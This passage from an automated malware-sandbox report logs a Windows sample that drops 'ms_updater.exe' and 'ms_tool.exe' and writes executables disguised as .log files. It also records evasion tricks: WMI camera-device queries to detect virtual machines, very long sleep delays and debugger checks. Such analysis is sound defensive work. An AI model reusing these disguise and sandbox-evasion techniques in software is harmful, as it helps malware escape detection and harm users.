                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: ktmw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: mmdevapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: ksuser.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: avrt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: audioses.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: midimap.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: dlnashext.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: wpdshext.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                  Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: 1hibLFnCm1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: 1hibLFnCm1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: mountvol.pdb source: 1hibLFnCm1.exe, 1hibLFnCm1.exe, 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp, ms_tool.exe, 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp, ms_tool.exe, 00000001.00000000.1699378223.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp, ms_tool.exe.0.dr
                  Source: Binary string: mountvol.pdbGCTL source: 1hibLFnCm1.exe, 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp, ms_tool.exe, 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp, ms_tool.exe, 00000001.00000000.1699378223.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp, ms_tool.exe.0.dr
                  Source: 1hibLFnCm1.exeStatic PE information: section name: .cSs
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: 0_2_00F5B495 push ecx; ret 0_2_00F5B4A8
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BAAFB02 pushad ; ret 3_2_00007FFD9BAAFB03
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BAA8163 push ebx; ret 3_2_00007FFD9BAA816A
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeFile created: C:\Users\user\AppData\Roaming\ms_updater.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile created: C:\Users\user\Desktop\mHYqxgSr.logJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile created: C:\Users\user\Desktop\gOvRVAND.logJump to dropped file
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeFile created: C:\Users\user\AppData\Roaming\ms_tool.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile created: C:\Users\user\Desktop\gOvRVAND.logJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile created: C:\Users\user\Desktop\mHYqxgSr.logJump to dropped file
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeMemory allocated: 1560000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeMemory allocated: 1AFD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 599844Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 599359Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 599130Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 598776Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 598669Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 598562Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 3600000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 598106Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 597989Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeWindow / User API: threadDelayed 667Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeWindow / User API: threadDelayed 2595Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeDropped PE file which has not been started: C:\Users\user\Desktop\mHYqxgSr.logJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeDropped PE file which has not been started: C:\Users\user\Desktop\gOvRVAND.logJump to dropped file
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-23406
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeAPI coverage: 9.6 %
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 6764Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948Thread sleep time: -599844s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948Thread sleep time: -599547s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948Thread sleep time: -599359s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948Thread sleep time: -599130s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948Thread sleep time: -599000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948Thread sleep time: -598890s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948Thread sleep time: -598776s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948Thread sleep time: -598669s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948Thread sleep time: -598562s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948Thread sleep time: -598453s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 7076Thread sleep time: -3600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948Thread sleep time: -598344s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 5868Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948Thread sleep time: -598234s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948Thread sleep time: -598106s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948Thread sleep time: -597989s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 7020Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 7076Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeCode function: 3_2_00007FFD9BAA8B98 GetSystemInfo,3_2_00007FFD9BAA8B98
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 599844Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 599359Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 599130Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 598776Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 598669Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 598562Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 3600000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 60000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 598106Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 597989Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                  Source: ms_updater.exe, 00000003.00000002.1764565356.000000001BA57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld6R
                  Source: ms_tool.exe, 00000001.00000002.1700859174.000001F61B760000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                  Source: w32tm.exe, 00000008.00000002.1810190735.0000012F753B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: 0_2_00F5B991 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F5B991
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeCode function: 0_2_00F6528D mov ecx, dword ptr fs:[00000030h]0_2_00F6528D
